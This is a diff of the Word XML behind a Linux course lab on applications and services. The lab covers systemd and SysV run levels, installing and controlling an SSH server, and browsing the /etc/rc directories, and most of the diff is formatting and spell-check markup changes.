xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="097A4D3D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -3503,13 +2582,13 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="1444762405">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="2" w16cid:durableId="1461336656">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="3" w16cid:durableId="823282930">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>

--- a/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
+++ b/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
@@ -32,13 +32,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> Module 1 Linux, Session 5, Applications and Services</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  These slides cover the current method of controlling services, systemd </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> Module 1 Linux, Session 5, Applications and Services.  These slides cover the current method of controlling services, systemd (</w:t>
       </w:r>
       <w:hyperlink r:id="rId6" w:history="1">
         <w:r>
@@ -81,6 +75,62 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Note:  The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ntsysv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> module referenced in slide 7 is not available in</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> current versions of</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Ubuntu.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  Ubuntu has an equivalent tool called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkservice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">.  You can install it, if you </w:t>
+      </w:r>
+      <w:r>
+        <w:t>wish, with</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo apt install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkservice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
       </w:r>
@@ -110,6 +160,9 @@
         <w:t>.pdf</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> (optional)</w:t>
+      </w:r>
+      <w:r>
         <w:br/>
         <w:t xml:space="preserve">     </w:t>
       </w:r>
@@ -128,7 +181,21 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">The most important things are the day to day uses:  </w:t>
+        <w:t xml:space="preserve">The most important things are the day to day </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>uses:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -161,7 +228,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at boot so they don’t lose their hold on the computer.  </w:t>
+        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>boot</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> so they don’t lose their hold on the computer.  </w:t>
       </w:r>
       <w:r>
         <w:t>(The security term for this is persistence.)</w:t>
@@ -250,7 +325,11 @@
         <w:t>will</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> use</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>use</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> SSH server</w:t>
@@ -287,8 +366,15 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called openssh-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
+        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>openssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
       </w:r>
       <w:r>
         <w:t>or</w:t>
@@ -303,7 +389,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>sudo apt install openssh-server</w:t>
+        <w:t xml:space="preserve">sudo apt install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>openssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -356,8 +456,44 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>/usr/sbin/sshd</w:t>
-      </w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sbin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -365,7 +501,15 @@
         <w:t>for SSH Daemon.  The service</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called sshd.  Go figure.</w:t>
+        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.  Go figure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -376,6 +520,11 @@
         <w:t xml:space="preserve">Backwards compatibility with SysV </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
         <w:t>(optional)</w:t>
       </w:r>
     </w:p>
@@ -467,7 +616,15 @@
         <w:t xml:space="preserve"> command </w:t>
       </w:r>
       <w:r>
-        <w:t>to stop, start, and restart the sshd service.  Each time you change the service, use</w:t>
+        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -476,6 +633,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>service ssh status</w:t>
       </w:r>
       <w:r>
@@ -494,20 +652,41 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>When you are done, make sure the sshd service is stopped.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">When you are done, make sure the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> service is stopped.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">If you run </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls /etc</w:t>
-      </w:r>
+        <w:t>ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -521,7 +700,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ls /etc/rc*</w:t>
+        <w:t xml:space="preserve"> ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -533,8 +740,16 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>to see just directories that start with rc</w:t>
-      </w:r>
+        <w:t xml:space="preserve">to see just directories that start with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -542,7 +757,15 @@
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the rc </w:t>
+        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>directories</w:t>
@@ -575,7 +798,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls -l /etc/rc</w:t>
+        <w:t>ls -l /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/rc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -645,25 +882,93 @@
         <w:t>The symbolic links</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (symlinks)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in /etc/rc</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/rc</w:t>
       </w:r>
       <w:r>
         <w:t>5</w:t>
       </w:r>
       <w:r>
-        <w:t>.d point to files in the /etc/init and /etc/init</w:t>
+        <w:t>.d point to files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t>d directories.  Look at the contents of those directories as well.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /etc/init.d </w:t>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>directory</w:t>
@@ -672,7 +977,31 @@
         <w:t>, you will see it contains a shell script.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  Remember, in SysV the init program looks at the files in the proper run level directory and then executes the files the symlinks point to.  It uses symlinks to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
+        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> point to.  It uses </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -728,77 +1057,211 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no init directory, since init is the name of the command used to change </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> directory, since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 5) </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
+        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/etc/rc.d/rc5.d</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
+        <w:t>run level</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>.  There is a</w:t>
+        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>n</w:t>
+        <w:t>run level</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /etc/rc5.d, but it is just a symlink that points to </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> 5) </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/etc/rc.d/rc5.d.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>To ease the burden of keeping track of the symlinks in the rc.d directories</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.  There is a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -809,33 +1272,55 @@
       <w:r>
         <w:t xml:space="preserve">called </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  In addition to maintaining the rc.d directories</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>, chkconfig</w:t>
-      </w:r>
+        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -880,6 +1365,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">The SysV command to change </w:t>
       </w:r>
       <w:r>
@@ -891,21 +1377,25 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> or </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>telinit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>,</w:t>
       </w:r>
@@ -939,12 +1429,14 @@
       <w:r>
         <w:t xml:space="preserve"> would be </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
